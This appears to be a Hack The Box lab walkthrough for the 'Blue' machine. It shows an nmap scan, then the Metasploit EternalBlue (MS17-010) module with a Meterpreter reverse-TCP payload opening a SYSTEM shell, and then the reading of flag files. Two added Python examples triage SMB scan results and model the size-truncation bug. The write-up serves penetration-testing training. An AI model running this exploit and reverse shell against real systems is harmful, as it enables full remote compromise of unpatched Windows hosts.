SYNOPSIS

The attack path demonstrated in this writeup is easier to outline with a picture than with a description, since a picture is worth a thousand words.

Attack Path - Blue

The aim of this walkthrough is to provide help with the Blue machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out with finishing the Beginner-Track challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

Finally, a very simple and basic file structure used throughout this writeup for this particular pentest:

  • 1_recon –> information gathering, enumeration and scanning, active/passive recon
  • 2_exploitation –> exploits, foothold, lateral movement
  • 3_post-exploitation –> privilege-escalation, lateral movement, persistence

It can be generated with the following one-liner:

mkdir 1_recon; mkdir 2_exploitation; mkdir 3_post-exploitation

INFORMATION-GATHERING

As usual, we start out with a quick connection check,

# shell command
ping -c 4 -n -R $rhost > connection-test.txt
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ ping -c 4 -n -R $rhost > connection-test.txt
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ cat connection-test.txt 
PING 10.129.174.73 (10.129.174.73) 56(124) bytes of data.
64 bytes from 10.129.174.73: icmp_seq=1 ttl=127 time=4.78 ms
64 bytes from 10.129.174.73: icmp_seq=2 ttl=127 time=3.46 ms
64 bytes from 10.129.174.73: icmp_seq=3 ttl=127 time=3.29 ms
64 bytes from 10.129.174.73: icmp_seq=4 ttl=127 time=3.08 ms

--- 10.129.174.73 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 3.075/3.651/4.778/0.664 ms
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$

followed by the usual TCP scan (version detection, default scripts, top ports).

# shell command
nmap -sV -sC -oN nmap-service-defscripts-topports-scan $rhost
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$ nmap -sV -sC -on nmap-service-defscripts-topports-scan $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 09:53 BST
Failed to resolve "nmap-service-defscripts-topports-scan".
Nmap scan report for 10.129.174.73
Host is up (0.068s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 0s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-03T09:54:40+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-06-03T08:54:41
|_  start_date: 2023-06-03T08:32:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.93 seconds
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/1_recon]
└──╼ []$

A couple of ports are reported open. (The "Failed to resolve" line is worth a second look: nmap's output flags are case-sensitive, and the normal-output flag is -oN, so the lowercase -on typed in the terminal session above was not understood as an output option; nmap took the file name for a target and the results were not saved under that name.) One thing clearly stands out though:

  • 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

or, put simply, SMB running on a rather old OS.

A quick internet search for its reported vulnerabilities lands us on - MS17-010 EternalBlue - which is the famous EternalBlue exploit: the same exploit that was used by the WannaCry ransomware a couple of years back, and which exploits CVE-2017-0144.
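As an added example, not part of the original walkthrough and not nmap or Hack The Box tooling, here is the triage a defender would run over this scan output in Python: it parses nmap's normal output, pulls the smb-os-discovery and smb-security-mode results, and flags the three conditions visible above, namely SMB exposed by a legacy Windows build, SMBv1 message signing disabled and SMBv2 signing not required. The sample input is the scan output shown above, trimmed; the parser, the rule list and the legacy-OS markers are assumptions of this example.

```python
import re
from dataclasses import dataclass, field

# Sample input: the relevant lines of the nmap output shown above, trimmed.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.129.174.73
Host is up (0.068s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m57s, deviation: 34m37s, median: 0s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
"""

REPORT_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# NSE output: "| name:" or "|_name: value" opens a script block (indent <= 1);
# "|   key: value" and "|_  key: value" are lines inside the current block.
SCRIPT_RE = re.compile(r"^\|(_?)( *)(.*)$")

# Assumed list of Windows builds that ship with SMBv1 enabled and are out of support.
LEGACY_OS_MARKERS = ("Windows XP", "Windows Vista", "Windows 7",
                     "Windows Server 2003", "Windows Server 2008")


@dataclass
class HostReport:
    address: str = "?"
    open_ports: dict = field(default_factory=dict)  # port -> (service, version)
    smb_os: str = ""          # OS line from smb-os-discovery
    smb1_signing: str = ""    # message_signing value from smb-security-mode
    smb2_signing: str = ""    # signing line from smb2-security-mode
    findings: list = field(default_factory=list)


def parse_nmap_output(text):
    """Parse nmap normal output for one host into a HostReport."""
    report = HostReport()
    section = None
    for raw in text.splitlines():
        line = raw.rstrip()
        m = REPORT_RE.match(line)
        if m:
            report.address = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m:
            if m.group(3) == "open":
                report.open_ports[int(m.group(1))] = (m.group(4), m.group(5))
            continue
        m = SCRIPT_RE.match(line)
        if not m:
            continue
        indent, body = len(m.group(2)), m.group(3)
        if indent <= 1:  # a new script block: "name: rest"
            section, _, body = body.partition(":")
            section, body = section.strip(), body.strip()
        if section == "smb-os-discovery" and body.startswith("OS:"):
            report.smb_os = body[3:].strip()
        elif section == "smb-security-mode" and body.startswith("message_signing:"):
            report.smb1_signing = body.split(":", 1)[1].strip()
        elif section == "smb2-security-mode" and "signing" in body.lower():
            report.smb2_signing = body
    return report


def triage(report):
    """Apply the defender-side rules for what stood out in the scan."""
    findings = []
    if 445 in report.open_ports:
        os_text = report.smb_os or report.open_ports[445][1]
        if any(marker in os_text for marker in LEGACY_OS_MARKERS):
            findings.append(f"SMB exposed by a legacy OS ({os_text}): "
                            "verify MS17-010 patch state and disable SMBv1")
        if report.smb1_signing.startswith("disabled"):
            findings.append("SMBv1 message signing disabled: require signing or retire SMBv1")
        if "not required" in report.smb2_signing.lower():
            findings.append("SMBv2 signing not required: require it via policy")
    report.findings = findings
    return report


def analyse(text):
    return triage(parse_nmap_output(text))


if __name__ == "__main__":
    r = analyse(SAMPLE_NMAP_OUTPUT)
    print(r.address, sorted(r.open_ports))
    for finding in r.findings:
        print(" -", finding)
```

Run against the scan above, all three rules fire; against a host with no 445/tcp the report carries no findings, which is the point of keying every SMB rule on the port actually being open.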

Since a module for it already exists in Metasploit, we simply continue from there.

EXPLOITATION

Firing up Metasploit

# shell command
msfconsole -q
# terminal interaction
┌─[eu-dedivip-1][10.10.14.20][htb-bluewalle@htb-ysgugzuhsh][~/blue/2_exploitation]
└──╼ []$ msfconsole -q
[msf](Jobs:0 Agents:0) >>

and searching for the aforementioned exploit

# msf command
search ms17-010 eternalblue
# terminal interaction
[msf](Jobs:0 Agents:0) >> search ms17-010 eternalblue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

[msf](Jobs:0 Agents:0) >>

provides us with several options. The one we will be using here is the most common one for EternalBlue, available at - exploit/windows/smb/ms17_010_eternalblue -. Selecting it,

# msf command
use 0
# terminal interaction
[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> 

and querying the module for information helps us verify that the exploit is indeed appropriate for our case.

# msf command
info
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> info

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon <sean.dillon@risksense.com>
  Dylan Davis <dylan.davis@risksense.com>
  thelightcosine
  wvu <wvu@metasploit.com>
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic Target
      1   Windows 7
      2   Windows Embedded Standard 7
      3   Windows Server 2008 R2
      4   Windows 8
      5   Windows 8.1
      6   Windows Server 2012
      7   Windows 10 Pro
      8   Windows 10 Enterprise Evaluation

Check supported:
  Yes

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://docs.metasploit.
                                            com/docs/using-metasploit/basics/using-metasploi
                                            t.html
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authent
                                            ication. Only affects Windows Server 2008 R2, Wi
                                            ndows 7, Windows Embedded Standard 7 target mach
                                            ines.
  SMBPass                         no        (Optional) The password for the specified userna
                                            me
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Tar
                                            get. Only affects Windows Server 2008 R2, Window
                                            s 7, Windows Embedded Standard 7 target machines
                                            .
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only
                                            affects Windows Server 2008 R2, Windows 7, Windo
                                            ws Embedded Standard 7 target machines.

Payload information:
  Space: 2000

Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
  https://www.exploit-db.com/exploits/42030

Also known as:
  ETERNALBLUE


View the full module info with the info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
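The module description above names the bug class behind MS17-010: a size computed at 32-bit (DWORD) width ends up in a 16-bit (WORD) field, so the buffer allocated for the converted list is smaller than the memmove that follows. As an added illustration, not the Srv driver code and not part of the original walkthrough, the following Python models that integer-truncation pattern on a constructed record format and shows the check the hardened form needs: compute at full width and refuse any total the field cannot hold. The wire format, the destination layout, the function names and the 16-bit limit are all assumptions of this example.

```python
WORD_MAX = 0xFFFF  # largest value a 16-bit (WORD) length field can hold


def encode_list(entries):
    """Serialize (name, value) pairs in a constructed wire format:
    1-byte name length, 2-byte value length, then the name and value bytes."""
    out = bytearray()
    for name, value in entries:
        out += len(name).to_bytes(1, "little")
        out += len(value).to_bytes(2, "little")
        out += name + value
    return bytes(out)


def iter_records(blob):
    """Yield (name, value) pairs from the wire format, rejecting truncated input."""
    pos = 0
    while pos < len(blob):
        if pos + 3 > len(blob):
            raise ValueError("truncated record header")
        name_len = blob[pos]
        value_len = int.from_bytes(blob[pos + 1:pos + 3], "little")
        start, end = pos + 3, pos + 3 + name_len + value_len
        if end > len(blob):
            raise ValueError("record runs past end of input")
        yield blob[start:start + name_len], blob[start + name_len:end]
        pos = end


def converted_record_size(name, value):
    """Size of one record in the (constructed) destination layout: an 8-byte
    header, the NUL-terminated name and the value, rounded up to 4 bytes."""
    raw = 8 + len(name) + 1 + len(value)
    return (raw + 3) & ~3


def required_size(blob):
    """Full-width total (Python ints do not wrap) the destination buffer needs."""
    return sum(converted_record_size(n, v) for n, v in iter_records(blob))


def vulnerable_size(blob):
    """The bug pattern: the wide total is stored into a 16-bit field, so any
    total of 64 KiB or more wraps around instead of being rejected."""
    return required_size(blob) & WORD_MAX


def hardened_size(blob):
    """Fixed form: compute at full width and refuse what the field cannot hold."""
    total = required_size(blob)
    if total > WORD_MAX:
        raise ValueError(f"list needs {total} bytes, exceeds 16-bit length field")
    return total


def convert(blob, size_fn):
    """Allocate size_fn(blob) bytes for the converted list and report whether a
    copy of required_size(blob) bytes would overrun it.
    Returns (allocated, needed, overflowed); a real memmove would not stop."""
    allocated = size_fn(blob)
    needed = required_size(blob)
    return allocated, needed, needed > allocated


if __name__ == "__main__":
    # Constructed inputs: each entry is small and well-formed; only the list total
    # is large, which is exactly the case the truncated size check misses.
    big = encode_list([(b"x", b"A" * 4000)] * 20)
    print("vulnerable:", convert(big, vulnerable_size))
    try:
        convert(big, hardened_size)
    except ValueError as err:
        print("hardened:", err)
```

Note that every individual record passes its own per-field limits; only the list total exceeds what the 16-bit field can express, which is why per-entry validation alone does not close this class of bug.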

Great, since it fits, all that’s left is to configure it properly and then run it. Listing the module’s options should help with the configuration.

# msf command
options
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit
                                             .com/docs/using-metasploit/basics/using-metaspl
                                             oit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authen
                                             tication. Only affects Windows Server 2008 R2,
                                             Windows 7, Windows Embedded Standard 7 target m
                                             achines.
   SMBPass                         no        (Optional) The password for the specified usern
                                             ame
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Ta
                                             rget. Only affects Windows Server 2008 R2, Wind
                                             ows 7, Windows Embedded Standard 7 target machi
                                             nes.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only
                                              affects Windows Server 2008 R2, Windows 7, Win
                                             dows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,
                                        none)
   LHOST     161.35.38.166    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

Looking at the default configuration, we can leave almost all settings untouched, except, of course, the target and local host settings.

Now, we could of course specify our target host’s OS too, setting it to match the - OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) - reported earlier during port scanning, but the module ships with automatic architecture and OS discovery, so why bother.

# msf command
set rhosts $rhost
set lhost tun0
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.129.174.73
rhosts => 10.129.174.73
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost tun0
lhost => 10.10.14.20
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

Looks like everything is properly set up, so let’s run a quick check and see if our target is vulnerable or not.

# msf command
check
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> check

[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>

It appears that our target is indeed vulnerable, so we run our exploit.

# msf command
run
# terminal interaction
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run

[*] Started reverse TCP handler on 10.10.14.20:4444 
[*] 10.129.174.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.174.73:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.174.73:445     - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.174.73:445 - The target is vulnerable.
[*] 10.129.174.73:445 - Connecting to target for exploitation.
[+] 10.129.174.73:445 - Connection established for exploitation.
[+] 10.129.174.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.174.73:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.174.73:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.129.174.73:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.129.174.73:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.129.174.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.174.73:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.174.73:445 - Sending all but last fragment of exploit packet
[*] 10.129.174.73:445 - Starting non-paged pool grooming
[+] 10.129.174.73:445 - Sending SMBv2 buffers
[+] 10.129.174.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.174.73:445 - Sending final SMBv2 buffers.
[*] 10.129.174.73:445 - Sending last fragment of exploit packet!
[*] 10.129.174.73:445 - Receiving response from exploit packet
[+] 10.129.174.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.174.73:445 - Sending egg to corrupted connection.
[*] 10.129.174.73:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.129.174.73
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.129.174.73:49158) at 2023-06-03 10:49:25 +0100
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.174.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(Meterpreter 1)(C:\Windows\system32) >

A meterpreter session was successfully opened and we have a shell connection to our target. As we can see, we are logged in with the NT AUTHORITY\SYSTEM account, which has the highest privileges on a local Windows system; it’s even more powerful than the local admin account. Therefore, there is simply no need for any lateral movement or privilege escalation on our part, as we already possess the privileges to access both of the flags.

# msf command
getuid
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) >

POST-EXPLOITATION

All that’s left for us now is to find and grab both the user and the root flags. We drop into the system command shell, since traversing the directories on a Windows system might seem easier via cmd.

# msf command
shell
# terminal interaction
(Meterpreter 1)(C:\Windows\system32) > shell
Process 1128 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Once we identify the local user account - haris -, we head over to his Desktop and grab the user flag.

# shell command
cd c:\users\
dir
cd haris\desktop\
dir
type user.txt
# terminal interaction
C:\Windows\system32> cd c:\users\
cd c:\users\

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,694,017,024 bytes free

c:\Users>cd haris\desktop\
cd haris\desktop\

c:\Users\haris\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users\haris\Desktop

24/12/2017  03:23    <DIR>          .
24/12/2017  03:23    <DIR>          ..
03/06/2023  09:33                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,694,017,024 bytes free

c:\Users\haris\Desktop>type user.txt
type user.txt
<user-flag>

c:\Users\haris\Desktop>

Grabbing the root flag is even easier, since we already know that it usually sits on the Administrator’s Desktop.

# shell command
type c:\users\administrator\desktop\root.txt
# terminal interaction
c:\Users\haris\Desktop> cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of c:\Users\Administrator\Desktop

24/12/2017  03:22    <DIR>          .
24/12/2017  03:22    <DIR>          ..
03/06/2023  09:33                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,694,017,024 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
<root-flag>

c:\Users\Administrator\Desktop>

With this, we have successfully pwned the target machine, congratulations. All that’s left now is to submit the flags and then terminate the target box (if not terminated already)!